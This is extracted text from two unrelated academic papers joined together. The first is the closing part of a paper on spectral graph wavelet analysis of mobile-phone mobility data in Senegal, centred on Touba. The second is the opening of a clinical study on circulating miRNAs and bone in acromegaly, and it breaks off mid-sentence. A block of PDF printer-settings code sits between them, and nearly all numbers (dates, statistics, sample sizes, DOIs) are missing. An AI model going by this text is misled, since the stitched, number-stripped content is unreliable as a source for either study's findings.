maouloud/gamou celebration that occurred on january , (day ) and independence day that occurred april th, (day ). there are two extra events that this clustering approach identified, around day and at the end of the year. the former is an unknown event; the authors do not know of any political, religious, or cultural gathering that occurred near touba at that time, though we note that the absence of evidence is not evidence of absence. indeed, the similarity of the network structure at day to that of other verified major migrations is a strong motivator for further investigation. the latter date, at the end of the year, is likely associated with new-years celebrations/holidays. crucially, the total traffic to/from touba does not change during many of these events, and they are not identified by clustering the relative population flow data; the scale of the dominant wavelet functions fluctuate due to changes in connectivity within the network and this manages to distinguish between typical traffic patterns and migration events. averaging the daily wavelet functions associated with each cluster (i.e., producing an average dominant wavelet function centered on touba for the dry and wet seasons, and for each short-term/large-scale event) reveals stark spatial differences (fig. ). for example, the absolute difference between the average wavelet function relating to the dry and wet watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ seasons (fig. a) identifies change in several coastal towns (along with changes in mobility in and around touba). these changes reflect two processes. first, in senegal there is a large and mobile agricultural work-force. seasonally employed farm laborers from the coast use touba as a stepping stone to rural locations in the interior of the country. second and also associated with the start of the rainy season are floods, and in the coast experienced significant flooding. these differences in the average wavelet functions associated with the dry and wet clusters also reflect the impact of the floods on human mobility. additional nuances emerge in the punctuated modes of mobility associated with the religious festivals noted earlier. in contrast to the seasonal changes in mobility, the absolute difference between the average wavelet function associated with short-term/large-scale events, in this case eid al-adha on october (day ), and the wet season identifies change in mobility to/from many small rural towns in the far east of senegal (fig. b). these differences in average dominant wavelet functions clearly identify the long-distance travel that people make as they go to/from touba for the religious event. this kind of geographically meaningful information can be used to explore differences in the various modes of human mobility found by clustering daily wavelet functions. in general, this approach more readily reveals heterogenous spatial and network features, relative to results produced from the analysis of the relative population mobility values, which simply described major seasonal changes in flows to/from touba. importantly, it bears noting that while we present results from touba, the spectral graph wavelet analysis also characterizes the main spatio-temporal scales and patterns of human mobility for every node within the network. hence, while we have demonstrated its utility with regards figure main spatio-temporal patterns of human mobility can be identified by averaging the dominant wavelet functions associated with the cluster groups shown in fig. b. then, these modes of human mobility can be compared by calculating their absolute difference and plotting as a map. (a) the absolute difference in the average dominant wavelet function (centered on touba) associated with the dry and wet seasons highlights changes in mobility to/from the coast and touba. (b) the absolute difference in the average wavelet function (centered on touba) associated with religious events and the wet season reveals changes in mobility in far-off towns in the east of senegal, and touba. full-size doi: . /peerj-cs. /fig- watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to touba, there is additional spatially meaningful information that we did not show or analyze. discussion to improve upon current abilities to characterize changes in human mobility over time we developed and applied a new manifold learning method based on spectral graph wavelets (i.e., hermitian graph wavelets) to a cdr dataset. these data describe the origin-destination mobility patterns for people living in senegal, daily for the year . our approach is non-linear, localized and scale explicit, that is it can be used to identify multiscale patterns of human mobility for each node in a mobility network. this is key to disentangling multiscale patterns with big and rich datasets like those produced by cdrs. spectral graph wavelets applied to these data allowed us to identify seasonal changes in senegalese human mobility, as well as punctuated large-scale events relating to religious migration and a national holiday. these short-term but large-spatial-scale events were not identified by a standard approach applied to the original mobility values themselves (i.e., a(t)), because these data contained too much noise. as a consequence, our spectral graph wavelets approach provides a new method for the multiscale decomposition of human mobility data, and expands the utility of cdr data for anticipating and preparing for changes in human mobility. identifying the main spatio-temporal scale and patterns of human mobility, and the spatio-temporal scales at which they occur, is an important part of developing policies for a whole host of operations, ranging from traffic infrastructure to disaster response planning (jiang, ferreira & gonzalez, ). these kinds of spatial policies have previously been made using far coarser data, both spatially and temporally (bell & ward, ). here, making use of relatively high resolution cdr data, we were able to tease out the spatial signal of punctuated large-scale events, in contrast to a standard approach applied to data on population flow values. the rate at which new data is created—always at higher temporal frequency and greater spatial resolution—is ever growing, and the quantitative tools used to extract useful information from monthly or even annual datasets are rapidly diminishing in utility (lee & kang, ). for the best use of these new data (i.e., next-gen cdr datasets) new tools are required, and indeed, new tools that can articulate the complex and adaptive nature of human mobility have extreme utility (scheffer et al., ). like human mobility, other complex adaptive systems are multiscale by nature (levin, ), and in general there is a growing need to extract information about the micro-scale agents that comprise these systems, from which meso- and macro-scale patterns emerge (folke, ). data-analytic tools designed with the multiscale nature of complex adaptive systems in mind will help policy makers develop plans that explicitly account for the emergence of patterns over a continuum of scales, like in this case the various modes of human mobility in senegal, and their associated network/geographic scale. the use of spectral graph wavelets allowed us to essentially transform the origin- destination mobility data (i.e., a(t)) to a form that better highlights the differences of human mobility patterns. in that spirit, this analysis can be thought of as a process of dimensional reduction or a denoising of the raw data, in a manner that accounts explicitly watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for network scale. analyzing the mobility data did not provide the same kinds of scale- dependent information because it is noisy. admittedly, when analyzing the mobility matrices a(t) we used a very basic approach to classification. there are indeed many other more sophisticated approaches that we could have been employed, in order to contrast with the results produced from analysis of the dominant wavelets functions. these approaches vary from traditional dimensional reduction techniques that rely on linear correlations, such as principal components analysis (pca), to machine learning approaches for feature identification (bi et al., ). indeed, we see that there is a great opportunity for using the wavelet transformed data in combination with machine learning approaches to classification and feature extraction. the multiscale and localized information that spectral graph wavelets provides can be used in many other ways. here, we have analyzed human mobility information gained from the cdr data, but the cdr dataset can also be used to construct human communication networks through time. performing the same analysis on both sets of data would produce concurrent wavelet functions through time. a comparison of changes in the main spatio-temporal scales and models of human communication and mobility might reveal early-warning signals of migration/displacement. simply put, as people prepare to move they are likely to call their ultimate destination, and this information can help policy makers prepare for changes in population density at specific nodes/places. there is an opportunity to utilize methods from manifold matching (shen, vogelstein & priebe, ) to make these comparisons. manifold matching has been used in image recognition to match photos of the same person, for example. here, instead of a set of photos from a person’s face, the manifolds that would be compared are those associated with a complex system (the senegal cellular network) described in two ways (i.e., communications and mobility). early detection of large-scale human migration is evident in our analysis. for example in fig. b, the days with large wavelet scale (i.e., the gray dots) often precede the date of the event (i.e., the vertical red lines). this suggest that our method could provide quantitative measures of “anomalous” mobility patterns associated with these events. for example, one could compare a given day’s dominant wavelet function with those from an average wavelet function constructed from the preceding week or month. this is similar to, but contrasts with, what we have done here comparing seasonal patterns of mobility. in doing so, one could compute how anomalous a given day is relative to recent times. this approach to anomaly detection is common, but the use of our hgw method to predict unknown oncoming events from cdr data would be novel. additional early-warning signals of mass human-mobility can also be sought from the dynamics inherent to mobility networks alone. these kinds of early-warning signals come from dynamical systems and bifurcation theory (scheffer et al., ) and are measured by changes in the variance and autocorrelation in macroscopic variables (boettiger, ross & hastings, ), for example changes in the density of people in a certain neighborhood. for human mobility cdr data, there is an opportunity to advance new early- warning signals of multiscale change using manifold learning. specifically, spectral graph wavelets is one way to learn changes in the geometry of the manifold on which dynamics watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ occur, but there are others, for example diffusion maps (coifman & lafon, ) and laplacian eigenmaps (belkin & niyogi, ). systems undergoing a bifurcation driven by some macroscopic variable should a fortiori exhibit changes in geometry at small and intermediate scales as well; a multiscale analysis may then allow one to directly address how these kinds of large and abrupt changes in complex systems are related to changes in the behavior of micro-scale agents (i.e. in this case, how individual people move from place to place). identifying the main spatio-temporal scales and patterns of human mobility, and potentially early-warning signals of changes between them, is of principal interest of groups tasked with managing human communities (jiang, ferreira & gonzalez, ), as they go about their everyday lives as well as respond to infrequent but impactful events like a natural hazard. in senegal, flooding is a persistent problem and indeed in the capital dakar was severely hit. these kinds of events can lead to the permanent displacement of people from their homes, and similarly to identifying the main spatio-temporal scales and patterns of human mobility as done here, there is value to identifying where and when this displacement occurs (xie et al., ). indeed, displacement is not necessarily instantaneous with regards to the perturbation, but it may take a relatively long time for people to “realize” their displacement (black et al., ). multiscale methods like spectral graph wavelets applied to cdr data can help distinguish these additional modes of human mobility, and further, methods from manifold matching are likely to be useful too. in sum, we have made advances to spectral graph wavelets (specifically hermitian graph wavelets) for analyzing cdr human mobility data. our approach extracts useful information that is localized and scale-explicit, and we identified seasonal changes in human mobility as well as punctuated large-scale mobility events associated with religious celebrations and a national holiday. here, we focused our multiscale analysis on one place in senegal—touba: a place of religious significance. however, the spectral graph wavelets analysis produces information for all nodes in the network, and there is rich vein of scale-explicit information in the full wavelet transform of the origin-destination mobility data. last, while the growth in data obtained for complex adaptive systems is daunting (scheffer et al., ), there are opportunities to employ new localized and scale-explicit dimensional reduction techniques, like we have done so here, to greatly improve our ability to characterize and predict multiscale change. this ability is vital if we are to maintain welfare from the complex systems in which we are embedded. additional information and declarations funding the authors received funding from the darpa young faculty award yfa n - - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: darpa young faculty award: yfa n - - - . watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests the authors declare that they have no competing interests. author contributions � james r. watson conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � zach gelbaum conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � mathew titus conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � grant zoch performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � david wrathall conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references balcan d, colizza v, gonçalves b, hu h, ramasco jj, vespignani a. . multiscale mobility networks and the spatial spreading of infectious diseases. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . barbosa h, barthelemy m, ghoshal g, james cr, lenormand m, louail t, menezes r, ramasco jj, simini f, tomasini m. . human mobility: models and applications. physics reports : – doi . /j.physrep. . . . becker ra, caceres r, hanson k, loh jm, urbanek s, varshavsky a, volinsky c. . a tale of one city: using cellular network data for urban planning. ieee pervasive computing ( ): – doi . /mprv. . . belik v, geisel t, brockmann d. . natural human mobility patterns and spatial spread of infectious diseases. physical review x ( ): doi . /physrevx. . . belkin m, niyogi p. . laplacian eigenmaps for dimensionality reduction and data representation. neural computation ( ): – doi . / . bell m, ward g. . comparing temporary mobility with permanent migration. tourism geographies ( ): – doi . / . bi j, bennett k, embrechts m, breneman c, song m. . dimensionality reduction via sparse support vector machines. journal of machine learning research (march): – . watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.physrep. . . http://dx.doi.org/ . /mprv. . http://dx.doi.org/ . /physrevx. . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ black r, arnell nw, adger wn, thomas d, geddes a. . migration, immobility and displacement outcomes following extreme events. environmental science & policy :s –s doi . /j.envsci. . . . blondel vd, guillaume j-l, lambiotte r, lefebvre e. . fast unfolding of communities in large networks. journal of statistical mechanics: theory and experiment ( ):p doi . / - / / /p . boettiger c, ross n, hastings a. . early warning signals: the charted and uncharted territories. theoretical ecology ( ): – doi . /s - - - . calabrese f, diao m, lorenzo gd, ferreira j, ratti c. . understanding individual mobility patterns from urban sensing data: a mobile phone trace example. transportation research part c: emerging technologies : – doi . /j.trc. . . . chen cp, zhang c-y. . data-intensive applications, challenges, techniques and technologies: a survey on big data. information sciences : – doi . /j.ins. . . . chung frk. . spectral graph theory, cbms regional conference series in mathematics. vol. . rhode island: american mathematical society. coifman rr, lafon s. . diffusion maps. applied and computational harmonic analysis ( ): – doi . /j.acha. . . . dobra a, williams ne, eagle n. . spatiotemporal detection of unusual human population behavior using mobile phone data. plos one ( ): – . dong x, ortega a, frossard p, vandergheynst p. . inference of mobility patterns via spectral graph wavelets. in: ieee international conference on acoustics, speech and signal processing, – . folke c. . resilience: the emergence of a perspective for social-ecological systems analyses. global environmental change ( ): – doi . /j.gloenvcha. . . . gelbaum z, titus m, watson j. . multi-scale analysis on complex networks using hermitian graph wavelets. available at http://arxiv.org/abs/ . . giannotti f, nanni m, pedreschi d, pinelli f, renso c, rinzivillo s, trasarti r. . unveiling the complexity of human mobility by querying and mining massive trajectory data. international journal on very large data bases ( ): – doi . /s - - - . hammond dk, vandergheynst p, gribonval r. . wavelets on graphs via spectral graph theory. applied and computational harmonic analysis ( ): – doi . /j.acha. . . . iqbal ms, choudhury cf, wang p, gonzalez mc. . development of original destination matrices using mobile phone call data. transportation research part c: emerging technologies : – doi . /j.trc. . . . jarv o, ahas r, witlox f. . understanding monthly variability in human activity spaces: a twelve-month study using mobile phone call detail records. transportation research part c: emerging technologies : – doi . /j.trc. . . . jiang s, ferreira j, gonzalez mc. . activity-based human mobility patterns inferred from mobile phone data: a case study of singapore. ieee transactions on big data ( ): – doi . /tbdata. . . lambiotte r, blondel vd, de kerchove c, huens e, prieur c, smoreda z, dooren pv. . geographical dispersal of mobile communication networks. physica a: statistical mechanics and its applications ( ): – doi . /j.physa. . . . lee j-g, kang m. . geospatial big data: challenges and opportunities. big data research ( ): – doi . /j.bdr. . . . watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.envsci. . . http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.trc. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.acha. . . http://dx.doi.org/ . /j.gloenvcha. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.acha. . . http://dx.doi.org/ . /j.trc. . . http://dx.doi.org/ . /j.trc. . . http://dx.doi.org/ . /tbdata. . http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . /j.bdr. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ levin sa. . ecosystems and the biosphere as complex adaptive systems. ecosystems ( ): – doi . /s . lu x, bengtsson l, holme p. . predictability of population displacement after the haiti earthquake. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . lu x, wrathall dj, sundsøy pr, nadiruzzaman m, wetter e, iqbal a, qureshi t, tatem a, canright g, engaz-monsen k, bengtsson l. . unveiling hidden migration and mobility patterns in climate stressed regions: a longitudinal study of six million anonymous mobile phone users in bangladesh. global environmental change : – doi . /j.gloenvcha. . . . mohan dm, asif mt, mitrovic n, dauwels j, jaillet p. . wavelets on graphs with application to transportation networks. in: th international ieee conference on intelligent transportation systems (itsc), – . phithakkitnukoon s, smoreda z, olivier p. . socio-geography of human mobility: a study using longitudinal mobile phone data. plos one ( ): – . scheffer m, bascompte j, brock wa, brovkin v, carpenter sr, dakos v, held h, van nes eh, rietkerk m, sugihara g. . early-warning signals for critical transitions. nature ( ): – doi . /nature . scheffer m, bolhuis je, borsboom d, buchman tg, gijzel smw, goulson d, kammenga je, kemp b, van de leemput ia, levin s, martin cm, melis rjf, van nes eh, romero lm, olde rikkert mgm. . quantifying resilience of humans and other animals. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . shen c, vogelstein jt, priebe ce. . manifold matching using shortest-path distance and joint neighborhood selection. pattern recognition letters : – doi . /j.patrec. . . . simini f, gonzalez mc, maritan a, barabasi a-l. . a universal model for mobility and migration patterns. nature ( ): – doi . /nature . song c, koren t, wang p, barabasi a-l. a. modelling the scaling properties of human mobility. nature physics ( ): – doi . /nphys . song c, qu z, blumm n, barabasi a-l. b. limits of predictability in human mobility. science ( ): – doi . /science. . tremblay n, borgnat p. . multiscale community mining in networks using spectral graph wavelets. in: st european signal processing conference (eusipco ). – . wesolowski a, buckee co, bengtsson l, wetter e, lu x, tatem aj. a. commentary: containing the ebola outbreak—the potential and challenge of mobile network data. plos currents : – . wesolowski a, stresman g, eagle n, stevenson j, owaga c, marube e, bousema t, drakeley c, cox j, buckee co. b. quantifying travel behavior for infectious disease research: a comparison of data from surveys and mobile phones. scientific reports : – . widhalm p, yang y, ulm m, athavale s, gonzalez mc. . discovering urban activity patterns in cell phone data. transportation ( ): – doi . /s - - -x. xie m, neal j, burke m, lobell d, ermon s. . transfer learning from deep features for remote sensing and poverty mapping. available at http://arxiv.org/abs/ . . watson et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.gloenvcha. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /nphys http://dx.doi.org/ . /science. http://dx.doi.org/ . /s - - -x http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ identifying multiscale spatio-temporal patterns in human mobility using manifold learning introduction methods results discussion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice : – e valassi et al. mirnas and bone in acromegaly research circulating mir- a- p and mir- - p are associated with bone parameters in patients with controlled acromegaly elena valassi , natalia garcía-giralt , jorge malouf , iris crespo , jaume llauger , adolfo díez-pérez and susan m webb endocrinology/medicine department, hospital sant pau, centro de investigación biomédica en red de enfermedades raras (ciberer, unidad ), iib-sant pau, isciii and universitat autònoma de barcelona (uab), barcelona, spain urfoa, imim (institut hospital del mar d’investigacions mèdiques), universitat autònoma de barcelona, barcelona, spain mineral metabolism unit, medicine department, hospital sant pau, barcelona, spain radiology department, hospital sant pau, barcelona, spain correspondence should be addressed to e valassi: evalassi@santpau.cat abstract background: biochemical control of gh/igf-i excess in acromegaly (acro) is associated with persistent impairment of trabecular microstructure leading to increased risk of vertebral fractures. circulating mirnas modulate the activity of osteoblasts and osteoclasts, and may be potential biomarkers of osteoporosis. aims: identify differentially expressed mirnas in the serum of patients with controlled acro vs controls and correlate mirna levels with both biochemical and structural bone parameters. patients and methods: twenty-seven patients with controlled acro ( males, females; mean age,  ±   years; bmi,  ±   kg/m ) and age-, gender- and bmi-matched controls were recruited. areal bmd at lumbar spine and femur, and trabecular bone score were assessed; volumetric bmd was measured by quantitative computed tomography qct-pro (mindways). twenty mirnas, chosen by their putative role in bone, were quantified in serum using real-time qpcr. results: in acro patients, mir- a- p and mir- - p were found overexpressed, whereas mir- - p was underexpressed (p <  . ). mir- a- p levels were negatively associated with both trabecular vbmd at trochanter and serum osteoprotegerin concentrations (p <  . ) and positively with vitamin d concentrations (p <  . ) and total cross-sectional area of the femoral neck (p <  . ). mir- - p levels were correlated with both trabecular vbmd at trochanter and opg concentrations (p <  . ), but were negatively associated with vitamin d levels (p <  . ). a negative correlation between mir- -a- p and mir- - p was found in both groups (p <  . ). conclusions: circulating mir- a- p and mir- - p are differentially expressed in controlled acro patients and associated with bone structural parameters. mirnas may be one of the mechanisms involved in the pathogenesis of bone disease and could be used as biomarkers in acro patients. - - key words f acromegaly f micrornas f volumetric bone mineral density id: - endocrine connections ( ) , – this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:evalassi@santpau.cat https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly pb– : introduction growth hormone (gh) and insulin-like growth factor-i (igf ) are anabolic hormones which influence bone metabolism through the modulation of several signaling pathways ( ). in vitro studies showed that gh enhances the proliferation and differentiation of osteoblastic cell lines driving the commitment of the mesenchymal stem cell (msc) to the osteoblastogenesis ( , , ). on the other hand, igf enhances the function of mature osteoblasts and maintains appropriate levels of bone matrix and bone mass ( ). acromegaly (acro) is a rare disease caused by excessive gh production from a pituitary adenoma ( ). chronic elevation of gh and igf in acro is associated with severe cardiovascular, respiratory and metabolic complications, which lead to an average -year reduction of life expectancy and a double standardized mortality rate as compared with the general population ( ). bone abnormalities are also a frequent manifestation of acro due to the deleterious effects of gh excess on bone remodeling and calcium homeostasis ( ). acro patients show increased bone turnover and deterioration of both biomechanical competence and microarchitecture at the trabecular compartment ( , , ). of note, the latter has been associated with an increased prevalence of vertebral fractures even in the controlled patients, in the presence of normal lumbar areal bone mineral density (abmd) ( ). cortical bone also appears to be impaired, in that a decrease in both bone material strength index (a marker of cortical bone properties), as assessed using microindentation, and femoral cortical volumetric bone mineral density (vbmd) have been described in acro patients despite biochemical control of the disease ( , ). mirnas are single-strand, non-coding rnas that span between and nucleotide bases ( ). these molecules are involved in the modulation of a wide variety of biological processes, including bone cell formation, bone remodeling, bone homeostasis and skeletal development ( ). in particular, subsets of mirnas influence the commitment and differentiation of the msc into the osteogenic lineage by regulating several molecular pathways ( ). indeed, the deregulation of mirna-mediated mechanisms has been described as an important pathogenic factor for bone degeneration and skeletal disease ( ). interestingly, mirnas also circulate in serum as extracellular nuclease-resistant entities through a variety of carriers, such as exosomes, apoptotic bodies and vesicle-free lipoprotein ( ). as a result, mirnas have been advocated as promising biomarkers to predict onset and progression of chronic disease, including osteoporosis ( ). different levels of circulating mirnas (‘signatures’) have been found in patients with both idiopathic ( ) and postmenopausal osteoporosis ( , , , ) and have been indicated as reliable predictors of fragility fractures in postmenopausal women with and without type diabetes ( , , , , , ). belaya et  al. recently analyzed bone samples from patients with active acro and found significant changes in the expression of several mirnas involved in osteoblastogenesis ( ). however, whether some circulating mirnas are associated with bone abnormalities in acro and, therefore, could represent useful markers to predict persistent bone impairment in these patients is still to be determined. thus, our cross-sectional study was aimed at evaluating if there are differentially expressed mirnas in the serum of patients with controlled acro as compared with sex-, age- and bmi-matched healthy controls. in addition, we examined if these differentially expressed mirnas are related to bone parameters in our patients, including bone turnover markers, vbmd at spine and femur and trabecular bone score (tbs), a tool designed to evaluate trabecular bone quality from the lumbar spine dxa image. subjects and methods subjects we studied patients ( females and males) with controlled acro who have been recruited successively while attending our clinic. eighteen of these patients ( %) had been evaluated in previous studies from our center ( , ). controlled acro was defined as igf concentrations within the specific age-adjusted reference range, and in those patients who were not on gh receptor antagonist, random gh concentrations were lower than ng/ml. when the g oral glucose load test was performed, the gh value equal to or < . ng/ml were considered suggestive of cured disease ( ). all had a gh-secreting pituitary tumor confirmed pathologically. five patients were on pharmacological treatment: three on somatostatin analogs (ssa) and the other two were on combination therapy with a ssa and either cabergoline or pegvisomant. all patients had transsphenoidal surgery from  months to  years (median:  years) prior to the this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly : inclusion in the study, and seven of them also received radiotherapy from to  years (median:  years) after unsuccessful surgery. three patients had secondary adrenal insufficiency, and all of them were on stable replacement dose of hydrocortisone. five patients had secondary hypothyroidism and were on stable replacement therapy with levothyroxine at the time of the study. four males had secondary hypogonadism. because all of them were on stable testosterone replacement for more than  year, they were considered eugonadal. nine women had regular menses and seven were postmenopausal. none of the patients had gh deficiency, diagnosed when igf-i levels were below two standard deviations for the age- sex normal range in a patient with at least three other documented hormone deficiencies or with a peak plasma gh less than μg/l during and insulin tolerance test (itt) ( ). mean (±s.d.) duration of disease was ±  months and was estimated as the time elapsed between the onset of symptoms and signs of acro (evaluated through old photographs and clinical history) and the time when treatment was proven to be effective. mean (±s.d.) duration of control was ±  months and was calculated from the time between hormone normalization and study entry. twenty-seven age-, gender- and bmi-matched controls were also studied, recruited through advertisements at the blood donor center of our hospital. control subjects who reported fragility fractures or who had morphometric vertebral fractures of any grade were excluded from the 